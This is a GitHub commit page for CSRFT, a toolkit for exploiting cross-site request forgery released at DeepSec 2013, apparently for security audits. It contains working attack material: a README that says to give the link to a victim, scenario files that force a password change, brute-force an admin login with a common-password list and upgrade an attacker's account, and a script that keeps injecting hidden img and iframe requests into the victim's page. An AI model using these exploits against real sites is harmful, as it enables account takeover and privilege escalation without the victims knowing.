Permalink
Browse files

First commit for the official release of CSRFT, DeepSec, 2013.

  • Loading branch information...
0 parents commit a6f80413ef37f4d78b7738b91dcc27aa409b4146 @PaulSec committed Nov 22, 2013
Oops, something went wrong.
@@ -0,0 +1,31 @@
+CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit
+
+This project has been developed for exploiting CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit.
+
+This project allows you to perform PoC (Proof Of Concepts) really easily. <br />
+For launching the project, you just need to do :
+
+<code>node server.js <conf file> <port, default: 8080></code>
+
+The server will be launched on the port 8080, so you can access it via : <code>http://0.0.0.0:8080 </code>.
+The file.json must be in the conf/ folder and describe your several attack scenarios.
+
+The index page displayed on the browser is accessible via : <code>/views/index.ejs</code>. <br />
+You can change it as you want and give the link to your victim.
+
+* Conf folder : add your audit.json file with your configuration. <br />
+* Exploits folder : add all your *.html files containing your forms (use form_creator or form_dumper if needed (See GitHub account : PaulSec)) <br />
+* public folder : containing js folder, jquery and inject.js (script loaded when accessing 0.0.0.0:8888)
+* views folder : index file and exploit template
+* server.js file - the HTTP server
+
+### Use case :
+
+If you want to perform a simple & fast exploitation of CSRF vulnerabilities, here are the steps to reproduce :
+
+1) Create your configuration file, see samples in conf/ folder<br />
+2) Add your *.html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable<br />
+3) If you want to do Dictionnary attack, add your dictionnary file to the dicos/ folder,<br />
+4) Replace the value of the field you want to perform this attack with the token '<%value%>' (without the single quote)<br />
+ => either in your urls if GET exploitation, or in the HTML files if POST exploitation. <br />
+5) Launch the application !<br />
@@ -0,0 +1,37 @@
+{
+ "audit": {
+ "name": "Deepsec Change Password",
+
+ "scenario": [
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/edit"
+ }
+ ]
+ },
+ {
+ "attack": [
+
+ {
+ "method": "POST",
+ "type_attack": "dico",
+ "file": "numbers_0_to_20.txt",
+ "form": "deepsec_form_change_password.html"
+ }
+ ]
+ },
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout"
+ }
+ ]
+ }
+ ]
+ }
+}
@@ -0,0 +1,39 @@
+{
+ "audit": {
+ "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",
+
+ "scenario": [
+ {
+ "attack": [
+ {
+ "method": "POST",
+ "type_attack": "dico",
+ "file": "passwords.txt",
+ "form": "deepsec_form_log_user.html",
+ "comment": "attempt to connect the admin with a list of selected passwords"
+ }
+ ]
+ },
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
+ "comment": "then, after the login session, we expect the admin to be logged in, attempt to get upgrade our account"
+ }
+ ]
+ },
+ {
+ "attack": [
+ {
+ "method": "GET",
+ "type_attack": "special_value",
+ "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
+ "comment": "The final step is to logout the admin"
+ }
+ ]
+ }
+ ]
+ }
+}
@@ -0,0 +1,20 @@
+1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
@@ -0,0 +1,26 @@
+password
+123456
+12345678
+abc123
+qwerty
+monkey
+letmein
+dragon
+111111
+baseball
+iloveyou
+trustno1
+1234567
+sunshine
+master
+123123
+welcome
+shadow
+ashley
+football
+jesus
+michael
+ninja
+mustang
+password1
+admin
@@ -0,0 +1,4 @@
+<form id="form-attaque" action="http://192.168.56.1/vuln-website/index.php/welcome/edit" method="POST">
+<input type="password" class="input-block-level" placeholder="Password" name="password" value="deepsecrocks">
+<input type="text" class="input-block-level" name="result" value="<%value%>">
+</form>
@@ -0,0 +1,4 @@
+<form action="http://192.168.56.1/vuln-website/index.php/welcome/login" method="POST">
+<input type="text" class="input-block-level" placeholder="Username" name="username" value="admin">
+<input type="password" class="input-block-level" placeholder="Password" name="password" value="<%value%>">
+</form>
@@ -0,0 +1,35 @@
+function insert_attacks_in_dom(data) {
+ for (index in data) {
+ // alert(data[attack].method);
+ var attack = data[index];
+ if (attack.method == "GET") {
+ // GET method (use img)
+ $('#attack').append('<img src="' + attack.url + '" height=0 width=0>');
+ } else {
+ // POST method (use iframe)
+ $('#attack').append('<iframe src="' + /payload/ + attack.num_scenario + '/' + attack.num_attack + '/' + attack.val + '" height=0 width=0>');
+ }
+ }
+}
+
+$(document).ready(function() {
+
+ setInterval(function() {
+
+ $.getJSON('exploit', function(data) {
+ // if result
+ if (data.length > 0) {
+
+ // insert a div in body
+ $('body').append('<div id="attack"></div>');
+ insert_attacks_in_dom(data);
+ }
+ });
+
+ // remove the div for the attack.
+ $('#attack').remove();
+
+ }, 10000);
+
+
+});
Oops, something went wrong.
Oops, something went wrong.

0 comments on commit a6f8041

Please sign in to comment.